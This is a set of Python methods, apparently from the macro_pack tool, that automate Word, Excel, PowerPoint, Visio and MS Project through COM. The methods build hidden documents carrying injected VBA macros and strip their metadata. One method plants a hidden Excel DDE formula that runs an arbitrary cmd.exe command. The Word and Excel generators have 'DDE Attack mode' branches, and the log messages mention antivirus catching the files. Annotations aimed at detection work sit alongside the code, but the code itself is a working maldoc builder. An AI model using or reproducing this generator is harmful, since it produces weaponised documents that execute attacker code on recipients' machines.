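def generate(self):
    """Build an MS Project file that carries the generated VBA and save it.

    Drives Project through COM: adds an empty project, loads every file
    returned by getVBAFiles() into its VBA project (the main file into the
    existing "ThisProject" component, each other file as a new standard
    module named after the file), then saves to self.outputFilePath.

    Exceptions raised during generation are caught and logged. The handler
    then asks Project to quit and force-kills winproj.exe if it is still
    running. Whatever enableVbom() switched on is undone on every exit path.
    """
    logging.info(" [+] Generating MSProject project...")
    vbomEnabled = False
    try:
        # Paired with disableVbom() further down. Presumably turns on
        # programmatic access to the VBA project model -- confirm against
        # its definition.
        self.enableVbom()
        vbomEnabled = True

        logging.info(" [-] Open MSProject project...")
        # Start Project with the win32com driver and add an empty project.
        MSProject = win32com.client.Dispatch("MSProject.Application")
        project = MSProject.Projects.Add()
        # Keep the application window hidden while it is automated.
        MSProject.Visible = False

        self.resetVBAEntryPoint()
        logging.info(" [-] Inject VBA...")
        for vbaFile in self.getVBAFiles():
            isMainFile = vbaFile == self.getMainVBAFile()
            with open(vbaFile, "r") as f:
                macro = f.read()
            if isMainFile:
                # The main macro goes into the project's built-in component.
                ProjectModule = project.VBProject.VBComponents("ThisProject")
            else:
                # 1 is the VBA extensibility constant for a standard module.
                ProjectModule = project.VBProject.VBComponents.Add(1)
                ProjectModule.Name = os.path.splitext(os.path.basename(vbaFile))[0]
            ProjectModule.CodeModule.AddFromString(macro)

        # No document-information removal is done for Project files; the
        # RemoveFileProperties assignment was already commented out.
        logging.info(" [-] Save MSProject project...")
        pjMPP = 0  # Save in the format of the installed Project version.
        project.SaveAs(self.outputFilePath, Format=pjMPP)
        MSProject.FileClose()
        MSProject.Quit()
        # Drop the COM reference so the application can exit.
        del MSProject
        self.disableVbom()
        vbomEnabled = False

        logging.info(" [-] Generated %s file path: %s" % (self.outputFileType, self.outputFilePath))
        # NOTE(review): getRunningApp is called unqualified here; confirm it
        # is imported by name in this module, otherwise this line raises
        # NameError and lands in the handler below after the file was saved.
        logging.info(" [-] Test with : \n%s --run %s\n" % (getRunningApp(), self.outputFilePath))

    except Exception:
        logging.exception(" [!] Exception caught!")
        logging.error(" [!] Hints: Check if MS Project is really closed and Antivirus did not catch the files")
        logging.error(" [!] Attempt to force close MS Project applications...")
        objProject = win32com.client.Dispatch("MSProject.Application")
        objProject.Application.Quit()
        # If Application.Quit() was not enough, force kill the process.
        if utils.checkIfProcessRunning("winproj.exe"):
            utils.forceProcessKill("winproj.exe")
        del objProject
    finally:
        # An aborted run must not leave the setting changed by enableVbom()
        # switched on, so undo it on the failure path as well.
        if vbomEnabled:
            try:
                self.disableVbom()
            except Exception:
                logging.exception(" [!] Could not restore the VBA object model access setting")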
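def generate(self):
    """Build a macro-enabled PowerPoint file from the generated VBA and save it.

    Drives PowerPoint through COM: adds a windowless presentation, loads every
    file returned by getVBAFiles() as a standard module named after the file,
    removes document information, saves to self.outputFilePath and finally
    calls _injectCustomUi().

    Exceptions raised during generation are caught and logged. The handler
    then asks PowerPoint to quit and force-kills powerpnt.exe if it is still
    running. Whatever enableVbom() switched on is undone on every exit path.
    """
    logging.info(" [+] Generating MS PowerPoint document...")
    vbomEnabled = False
    try:
        # Paired with disableVbom() further down. Presumably turns on
        # programmatic access to the VBA project model -- confirm against
        # its definition.
        self.enableVbom()
        vbomEnabled = True

        # Start PowerPoint with the win32com driver.
        ppt = win32com.client.Dispatch("PowerPoint.Application")
        logging.info(" [-] Open presentation...")
        presentation = ppt.Presentations.Add(WithWindow=False)

        self.resetVBAEntryPoint()
        logging.info(" [-] Inject VBA...")
        for vbaFile in self.getVBAFiles():
            with open(vbaFile, "r") as f:
                macro = f.read()
            # 1 is the VBA extensibility constant for a standard module.
            pptModule = presentation.VBProject.VBComponents.Add(1)
            pptModule.Name = os.path.splitext(os.path.basename(vbaFile))[0]
            pptModule.CodeModule.AddFromString(macro)

        # ppRDIAll asks PowerPoint to remove every category of document
        # information, so the saved file has no author-type properties;
        # triage of such a file has to rely on its content, not metadata.
        logging.info(" [-] Remove hidden data and personal info...")
        ppRDIAll = 99
        presentation.RemoveDocumentInformation(ppRDIAll)

        logging.info(" [-] Save presentation...")
        # 25 / 27 are the macro-enabled presentation / template save formats.
        # The lookup uses the last five characters of the path as-is, so any
        # other suffix (or different letter case) raises KeyError and ends up
        # in the handler below.
        pptXMLFileFormatMap = {".pptm": 25, ".potm": 27}
        if MSTypes.PPT == self.outputFileType:
            presentation.SaveAs(
                self.outputFilePath,
                FileFormat=pptXMLFileFormatMap[self.outputFilePath[-5:]])
        ppt.Presentations(1).Close()
        ppt.Quit()
        # Drop the COM reference so the application can exit.
        del ppt
        self.disableVbom()
        vbomEnabled = False

        logging.info(" [-] Inject Custom UI...")
        self._injectCustomUi()

        logging.info(" [-] Generated %s file path: %s" % (self.outputFileType, self.outputFilePath))
        logging.info(" [-] Test with : \n%s --run %s\n" % (utils.getRunningApp(), self.outputFilePath))

    except Exception:
        logging.exception(" [!] Exception caught!")
        logging.error(" [!] Hints: Check if MS office is really closed and Antivirus did not catch the files")
        logging.error(" [!] Attempt to force close MS Powerpoint application...")
        ppt = win32com.client.Dispatch("PowerPoint.Application")
        ppt.Quit()
        # If Quit() was not enough, force kill the process.
        if utils.checkIfProcessRunning("powerpnt.exe"):
            utils.forceProcessKill("powerpnt.exe")
        del ppt
    finally:
        # An aborted run must not leave the setting changed by enableVbom()
        # switched on, so undo it on the failure path as well.
        if vbomEnabled:
            try:
                self.disableVbom()
            except Exception:
                logging.exception(" [!] Could not restore the VBA object model access setting")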
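def generate(self):
    """Build a Visio document that carries the generated VBA and save it.

    Drives Visio through COM using the invisible application object: adds a
    document, saves it once to self.outputFilePath to fix its format, loads
    every file returned by getVBAFiles() (the main file into the existing
    "ThisDocument" component, each other file as a new standard module named
    after the file), then saves again and closes.

    Exceptions raised during generation are caught and logged. The handler
    then asks Visio to quit and force-kills visio.exe if it is still running.
    Whatever enableVbom() switched on is undone on every exit path.
    """
    logging.info(" [+] Generating MS Visio document...")
    vbomEnabled = False
    try:
        # Paired with disableVbom() further down. Presumably turns on
        # programmatic access to the VBA project model -- confirm against
        # its definition.
        self.enableVbom()
        vbomEnabled = True

        logging.info(" [-] Open document...")
        # "Visio.InvisibleApp" runs Visio in the background without a window.
        visio = win32com.client.Dispatch("Visio.InvisibleApp")
        document = visio.Documents.Add("")

        logging.info(" [-] Save document format...")
        document.SaveAs(self.outputFilePath)

        self.resetVBAEntryPoint()
        logging.info(" [-] Inject VBA...")
        for vbaFile in self.getVBAFiles():
            isMainFile = vbaFile == self.getMainVBAFile()
            with open(vbaFile, "r") as f:
                macro = f.read()
            if isMainFile:
                # The main macro goes into the document's built-in component.
                visioModule = document.VBProject.VBComponents("ThisDocument")
            else:
                # 1 is the VBA extensibility constant for a standard module.
                visioModule = document.VBProject.VBComponents.Add(1)
                visioModule.Name = os.path.splitext(os.path.basename(vbaFile))[0]
            visioModule.CodeModule.AddFromString(macro)

        # Ask Visio to drop personal information when the document is saved.
        logging.info(" [-] Remove hidden data and personal info...")
        document.RemovePersonalInformation = True

        document.Save()
        document.Close()
        visio.Application.Quit()
        # Drop the COM reference so the application can exit.
        del visio
        self.disableVbom()
        vbomEnabled = False

        logging.info(" [-] Generated %s file path: %s" % (self.outputFileType, self.outputFilePath))
        logging.info(" [-] Test with : \n%s --run %s\n" % (utils.getRunningApp(), self.outputFilePath))

    except Exception:
        logging.exception(" [!] Exception caught!")
        logging.error(" [!] Hints: Check if MS office is really closed and Antivirus did not catch the files")
        logging.error(" [!] Attempt to force close MS Visio applications...")
        visio = win32com.client.Dispatch("Visio.InvisibleApp")
        visio.Application.Quit()
        # If Application.Quit() was not enough, force kill the process.
        if utils.checkIfProcessRunning("visio.exe"):
            utils.forceProcessKill("visio.exe")
    finally:
        # An aborted run must not leave the setting changed by enableVbom()
        # switched on, so undo it on the failure path as well.
        if vbomEnabled:
            try:
                self.disableVbom()
            except Exception:
                logging.exception(" [!] Could not restore the VBA object model access setting")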
def run(self):
    """Open the workbook at self.outputFilePath and write a DDE formula into it.

    The command text comes from the "Cmd_Line" input parameter, filled in by
    fillInputParams(). The formula is written to row 1, column 26 and marked
    FormulaHidden, document information is removed, and the workbook is saved
    in place.

    Exceptions are caught and logged. The handler then asks Excel to quit and
    force-kills Excel.exe if it is still running.

    For detection work, the artifact this leaves is a cell formula of the
    shape =MSEXCEL|'...cmd.exe /c <command>'!A1 in the saved workbook.
    """
    logging.info(" [+] Generating MS Excel with DDE document...")
    try:
        # Get command line
        paramDict = OrderedDict([("Cmd_Line", None)])
        self.fillInputParams(paramDict)
        command = paramDict["Cmd_Line"]

        logging.info(" [-] Open document...")
        # Open an instance of Excel with the win32com driver.
        excel = win32com.client.Dispatch("Excel.Application")
        # Visibility is left at whatever Excel defaults to: the assignment
        # below is commented out.
        #excel.Visible = False
        workbook = excel.Workbooks.Open(self.outputFilePath)

        # The log text tells the operator to answer 'No' to a popup,
        # presumably the prompt Excel raises for the DDE link -- TODO confirm.
        logging.info(" [-] Inject DDE field (Answer 'No' to popup)...")

        # Trailing whitespace is stripped from the command; nothing else is
        # validated or escaped before it is placed inside the quoted part.
        ddeCmd = r"""=MSEXCEL|'\..\..\..\Windows\System32\cmd.exe /c %s'!A1""" % command.rstrip()
        excel.Cells(1, 26).Formula = ddeCmd
        excel.Cells(1, 26).FormulaHidden = True

        # xlRDIAll asks Excel to remove every category of document
        # information, so the saved file has no author-type properties.
        logging.info(" [-] Remove hidden data and personal info...")
        xlRDIAll = 99
        workbook.RemoveDocumentInformation(xlRDIAll)
        logging.info(" [-] Save Document...")
        # Suppress Excel's own dialogs while saving and closing.
        excel.DisplayAlerts = False
        excel.Workbooks(1).Close(SaveChanges=1)
        excel.Application.Quit()

        # Drop the COM reference so the application can exit.
        del excel
        logging.info(" [-] Generated %s file path: %s" % (self.outputFileType, self.outputFilePath))

    except Exception:
        logging.exception(" [!] Exception caught!")
        logging.error(" [!] Hints: Check if MS office is really closed and Antivirus did not catch the files")
        logging.error(" [!] Attempt to force close MS Excel applications...")
        objExcel = win32com.client.Dispatch("Excel.Application")
        objExcel.Application.Quit()
        del objExcel
        # If Application.Quit() was not enough, force kill the process.
        if utils.checkIfProcessRunning("Excel.exe"):
            utils.forceProcessKill("Excel.exe")
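def check(self):
    """Report whether PowerPoint can be automated on this machine.

    Returns:
        False when PowerPoint is already running and the operator declines
        to have it killed, or when the "PowerPoint.Application" COM object
        cannot be created and quit; True otherwise.
    """
    logging.info(" [-] Check feasibility...")
    if utils.checkIfProcessRunning("powerpnt.exe"):
        logging.error(" [!] Cannot generate PowerPoint payload if PowerPoint is already running.")
        # Presumably terminates the running application by image name, so
        # unsaved work there would be lost; that is why the operator is
        # asked first.
        if utils.yesOrNo(" Do you want macro_pack to kill PowerPoint process? "):
            utils.forceProcessKill("powerpnt.exe")
        else:
            return False
    try:
        ppt = win32com.client.Dispatch("PowerPoint.Application")
        ppt.Quit()
        del ppt
    except Exception:
        # Catch Exception rather than everything, so Ctrl-C or SystemExit
        # is not misreported as a missing installation.
        logging.error(" [!] Cannot access PowerPoint.Application object. Is software installed on machine? Abort.")
        return False
    return True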
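def check(self):
    """Report whether MS Project can be automated on this machine.

    Returns:
        False when Project is already running and neither
        self.mpSession.forceYes nor the operator's answer allows killing it,
        or when the "MSProject.Application" COM object cannot be created and
        quit; True otherwise.
    """
    logging.info(" [-] Check feasibility...")
    if utils.checkIfProcessRunning("winproj.exe"):
        logging.error(" [!] Cannot generate MS Project payload if Project is already running.")
        # With forceYes set the prompt is skipped and the process is killed
        # without asking; unsaved work in Project would presumably be lost.
        if self.mpSession.forceYes or utils.yesOrNo(" Do you want macro_pack to kill Ms Project process? "):
            utils.forceProcessKill("winproj.exe")
        else:
            return False
    try:
        objProject = win32com.client.Dispatch("MSProject.Application")
        objProject.Application.Quit()
        del objProject
    except Exception:
        # Catch Exception rather than everything, so Ctrl-C or SystemExit
        # is not misreported as a missing installation.
        logging.error(" [!] Cannot access MSProject.Application object. Is software installed on machine? Abort.")
        return False
    return True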
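def check(self):
    """Report whether Visio can be automated on this machine.

    Returns:
        False when Visio is already running and the operator declines to
        have it killed, or when the "Visio.InvisibleApp" COM object cannot
        be created and quit; True otherwise.
    """
    logging.info(" [-] Check feasibility...")
    if utils.checkIfProcessRunning("visio.exe"):
        logging.error(" [!] Cannot generate Visio payload if Visio is already running.")
        # Presumably terminates the running application by image name, so
        # unsaved work there would be lost; that is why the operator is
        # asked first.
        if utils.yesOrNo(" Do you want macro_pack to kill Visio process? "):
            utils.forceProcessKill("visio.exe")
        else:
            return False
    try:
        objVisio = win32com.client.Dispatch("Visio.InvisibleApp")
        objVisio.Application.Quit()
        del objVisio
    except Exception:
        # Catch Exception rather than everything, so Ctrl-C or SystemExit
        # is not misreported as a missing installation.
        logging.error(" [!] Cannot access Visio.InvisibleApp object. Is software installed on machine? Abort.")
        return False
    return True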
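def check(self):
    """Report whether Word can be automated on this machine.

    Returns:
        False when Word is already running and the operator declines to have
        it killed, or when the "Word.Application" COM object cannot be
        created and quit; True otherwise.
    """
    logging.info(" [-] Check feasibility...")
    if utils.checkIfProcessRunning("winword.exe"):
        logging.error(" [!] Cannot generate Word payload if Word is already running.")
        # Presumably terminates the running application by image name, so
        # unsaved work there would be lost; that is why the operator is
        # asked first.
        if utils.yesOrNo(" Do you want macro_pack to kill Word process? "):
            utils.forceProcessKill("winword.exe")
        else:
            return False
    try:
        objWord = win32com.client.Dispatch("Word.Application")
        objWord.Application.Quit()
        del objWord
    except Exception:
        # Catch Exception rather than everything, so Ctrl-C or SystemExit
        # is not misreported as a missing installation.
        logging.error(" [!] Cannot access Word.Application object. Is software installed on machine? Abort.")
        return False
    return True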
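def generate(self):
    """Build an Excel workbook that carries the generated VBA and save it.

    Drives Excel through COM: adds a workbook, loads every file returned by
    getVBAFiles() (the main file into the existing "ThisWorkbook" component,
    each other file as a new standard module named after the file), removes
    document information and saves to self.outputFilePath in the format
    selected by self.outputFileType. When self.mpSession.ddeMode is set,
    insertDDE() is called afterwards.

    Exceptions raised during generation are caught and logged. The handler
    then asks Excel to quit and force-kills Excel.exe if it is still running.
    Whatever enableVbom() switched on is undone on every exit path.
    """
    logging.info(" [+] Generating MS Excel document...")
    vbomEnabled = False
    try:
        # Paired with disableVbom() further down. Presumably turns on
        # programmatic access to the VBA project model -- confirm against
        # its definition.
        self.enableVbom()
        vbomEnabled = True

        # Start Excel with the win32com driver and keep its window hidden.
        excel = win32com.client.Dispatch("Excel.Application")
        excel.Visible = False
        # A fresh workbook is always created; no existing file is opened.
        logging.info(" [-] Open workbook...")
        workbook = excel.Workbooks.Add()

        self.resetVBAEntryPoint()
        logging.info(" [-] Inject VBA...")
        for vbaFile in self.getVBAFiles():
            logging.debug(" [,] Loading %s " % vbaFile)
            isMainFile = vbaFile == self.getMainVBAFile()
            with open(vbaFile, "r") as f:
                macro = f.read()
            if isMainFile:
                # The main macro goes into the workbook's built-in component.
                excelModule = workbook.VBProject.VBComponents("ThisWorkbook")
            else:
                # 1 is the VBA extensibility constant for a standard module.
                excelModule = workbook.VBProject.VBComponents.Add(1)
                excelModule.Name = os.path.splitext(os.path.basename(vbaFile))[0]
            excelModule.CodeModule.AddFromString(macro)

        # Suppress Excel's own dialogs for the remaining steps.
        excel.DisplayAlerts = False

        # xlRDIAll asks Excel to remove every category of document
        # information, so the saved file has no author-type properties;
        # triage of such a file has to rely on its content, not metadata.
        logging.info(" [-] Remove hidden data and personal info...")
        xlRDIAll = 99
        workbook.RemoveDocumentInformation(xlRDIAll)

        logging.info(" [-] Save workbook...")
        xlExcel8 = 56  # Excel 97-2003 binary workbook
        # 51 / 52 / 53: Open XML workbook, macro-enabled workbook,
        # macro-enabled template. The lookup uses the last five characters of
        # the path as-is, so any other suffix (or different letter case)
        # raises KeyError and ends up in the handler below.
        xlXMLFileFormatMap = {".xlsx": 51, ".xlsm": 52, ".xltm": 53}
        if self.outputFileType == MSTypes.XL97:
            workbook.SaveAs(self.outputFilePath, FileFormat=xlExcel8)
        elif MSTypes.XL == self.outputFileType:
            workbook.SaveAs(
                self.outputFilePath,
                FileFormat=xlXMLFileFormatMap[self.outputFilePath[-5:]])
        excel.Workbooks(1).Close(SaveChanges=1)
        excel.Application.Quit()
        # Drop the COM reference so the application can exit.
        del excel
        self.disableVbom()
        vbomEnabled = False

        if self.mpSession.ddeMode:  # DDE Attack mode
            self.insertDDE()

        logging.info(" [-] Generated %s file path: %s" % (self.outputFileType, self.outputFilePath))
        logging.info(" [-] Test with : \n%s --run %s\n" % (utils.getRunningApp(), self.outputFilePath))

    except Exception:
        logging.exception(" [!] Exception caught!")
        logging.error(" [!] Hints: Check if MS office is really closed and Antivirus did not catch the files")
        logging.error(" [!] Attempt to force close MS Excel applications...")
        objExcel = win32com.client.Dispatch("Excel.Application")
        objExcel.Application.Quit()
        # If Application.Quit() was not enough, force kill the process.
        if utils.checkIfProcessRunning("Excel.exe"):
            utils.forceProcessKill("Excel.exe")
        del objExcel
    finally:
        # An aborted run must not leave the setting changed by enableVbom()
        # switched on, so undo it on the failure path as well.
        if vbomEnabled:
            try:
                self.disableVbom()
            except Exception:
                logging.exception(" [!] Could not restore the VBA object model access setting")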
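def generate(self):
    """Build a Word document that carries the generated VBA and save it.

    Drives Word through COM: adds a document, saves it once to
    self.outputFilePath in the format selected by self.outputFileType, loads
    every file returned by getVBAFiles() (the main file into the existing
    "ThisDocument" component, each other file as a new standard module named
    after the file), removes document information, then saves and closes.
    When self.mpSession.ddeMode is set, insertDDE() is called afterwards.

    Exceptions raised during generation are caught and logged. The handler
    then asks Word to quit and force-kills winword.exe if it is still
    running. Whatever enableVbom() switched on is undone on every exit path.
    """
    logging.info(" [+] Generating MS Word document...")
    vbomEnabled = False
    try:
        # Paired with disableVbom() further down. Presumably turns on
        # programmatic access to the VBA project model -- confirm against
        # its definition.
        self.enableVbom()
        vbomEnabled = True

        logging.info(" [-] Open document...")
        # Start Word with the win32com driver and keep its window hidden.
        word = win32com.client.Dispatch("Word.Application")
        word.Visible = False
        document = word.Documents.Add()

        logging.info(" [-] Save document format...")
        wdFormatDocument = 0  # Word 97-2003 binary document
        # 12 / 13 / 15: Open XML document, macro-enabled document,
        # macro-enabled template. The lookup uses the last five characters of
        # the path as-is, so any other suffix (or different letter case)
        # raises KeyError and ends up in the handler below.
        wdXMLFileFormatMap = {".docx": 12, ".docm": 13, ".dotm": 15}
        if MSTypes.WD97 == self.outputFileType:
            document.SaveAs(self.outputFilePath, FileFormat=wdFormatDocument)
        elif MSTypes.WD == self.outputFileType:
            document.SaveAs(
                self.outputFilePath,
                FileFormat=wdXMLFileFormatMap[self.outputFilePath[-5:]])

        self.resetVBAEntryPoint()
        logging.info(" [-] Inject VBA...")
        for vbaFile in self.getVBAFiles():
            logging.debug(" -> File %s" % vbaFile)
            isMainFile = vbaFile == self.getMainVBAFile()
            with open(vbaFile, "r") as f:
                macro = f.read()
            if isMainFile:
                # The main macro goes into the document's built-in component.
                wordModule = document.VBProject.VBComponents("ThisDocument")
                wordModule.CodeModule.AddFromString(macro)
            else:
                # 1 is the VBA extensibility constant for a standard module.
                wordModule = document.VBProject.VBComponents.Add(1)
                wordModule.Name = os.path.splitext(os.path.basename(vbaFile))[0]
                wordModule.CodeModule.AddFromString(macro)
                # NOTE(review): this refresh-and-save sequence is kept on the
                # extra-module branch; confirm that placement against the
                # original file layout.
                document.Application.Options.Pagination = False
                document.UndoClear()
                document.Repaginate()
                document.Application.ScreenUpdating = True
                document.Application.ScreenRefresh()
                document.Save()

        # wdRDIAll asks Word to remove every category of document
        # information, so the saved file has no author-type properties;
        # triage of such a file has to rely on its content, not metadata.
        logging.info(" [-] Remove hidden data and personal info...")
        wdRDIAll = 99
        document.RemoveDocumentInformation(wdRDIAll)

        document.Save()
        document.Close()
        word.Application.Quit()
        # Drop the COM reference so the application can exit.
        del word
        self.disableVbom()
        vbomEnabled = False

        if self.mpSession.ddeMode:  # DDE Attack mode
            self.insertDDE()

        logging.info(" [-] Generated %s file path: %s" % (self.outputFileType, self.outputFilePath))
        logging.info(" [-] Test with : \n%s --run %s\n" % (utils.getRunningApp(), self.outputFilePath))

    except Exception:
        logging.exception(" [!] Exception caught!")
        logging.error(" [!] Hints: Check if MS office is really closed and Antivirus did not catch the files")
        logging.error(" [!] Attempt to force close MS Word...")
        objWord = win32com.client.Dispatch("Word.Application")
        objWord.Application.Quit()
        # If Application.Quit() was not enough, force kill the process.
        if utils.checkIfProcessRunning("winword.exe"):
            utils.forceProcessKill("winword.exe")
        del objWord
    finally:
        # An aborted run must not leave the setting changed by enableVbom()
        # switched on, so undo it on the failure path as well.
        if vbomEnabled:
            try:
                self.disableVbom()
            except Exception:
                logging.exception(" [!] Could not restore the VBA object model access setting")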